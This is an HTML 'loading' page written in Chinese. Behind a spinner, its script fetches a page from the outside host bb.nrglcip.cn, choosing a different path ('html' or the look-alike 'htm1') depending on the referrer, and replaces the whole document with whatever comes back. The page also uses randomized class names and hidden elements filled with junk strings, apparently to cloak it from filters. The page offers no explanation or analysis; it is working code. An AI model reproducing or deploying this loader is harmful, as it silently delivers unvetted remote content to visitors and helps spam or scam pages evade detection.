<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MgbZOYG {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MgbZOYG .ZkpEPl7HR0S {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MgbZOYG .content {
            line-height: 50px;
            text-align: center
        }

        .MgbZOYG .img {
            width: 100%
        }

        .MgbZOYG .riLB9tZ {
            text-align: center
        }

        .MgbZOYG .riLB9tZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MgbZOYG .riLB9tZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MgbZOYG .riLB9tZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MgbZOYG .riLB9tZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MgbZOYG .riLB9tZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MgbZOYG .riLB9tZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MgbZOYG .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function msKsvwYFe2gJe(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SdfxC8z = msKsvwYFe2gJe('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SdfxC8z +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SdfxC8z +".html?a=share";
		}
		
        JI1bbYhO=url+"#"+new Date().getTime();
        JI1bbYhO && function() {
            $.get(JI1bbYhO, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >zPIP6VBfG4rxJMaqPt4IIESZMSnhrNg3rQGW7V92jJb7fRw</h1>
<a  href='#' style='display:none'>d6yaXAVVwuwnAh0U0MfnwNGiHOaeS5L3pwOPt14HLvbVAzo1yMVjjY0wOvCWa</a>
<p  style='display:none'>N61gB8r0vzD6U48EvZufUkeDVdyOvMyDMGSTe2Mc88fYGm8Z3pyhLw5Um9rF9D2gN3ZDfiUlUxaZY</p>
<a  href='#' style='display:none'>d6yaXAVVwuwnAh0U0MfnwNGiHOaeS5L3pwOPt14HLvbVAzo1yMVjjY0wOvCWa</a><div class="MgbZOYG">
    <div class="ZkpEPl7HR0S">
        <div class="riLB9tZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >Lo6uGtTLYN6OgPOdrluTyr2tjqsx6VVQjbg18JpJLMeYEsKgHcjUWx8zg2WxDLi</li>
<h1 style='display:none' >bYKZcQ3j8eQPQX</h1>
<h1 style='display:none' >bYKZcQ3j8eQPQX</h1>
<h1 style='display:none' >bYKZcQ3j8eQPQX</h1>
<span style='display:none'>fFotMj3LV9KtMIEjRPX7wROFfJDGhD6jPkwIDxFU5WtZTRUXZsMwx4TMfTFoWweG60jr</span>
<span style='display:none'>fFotMj3LV9KtMIEjRPX7wROFfJDGhD6jPkwIDxFU5WtZTRUXZsMwx4TMfTFoWweG60jr</span></body>
</html>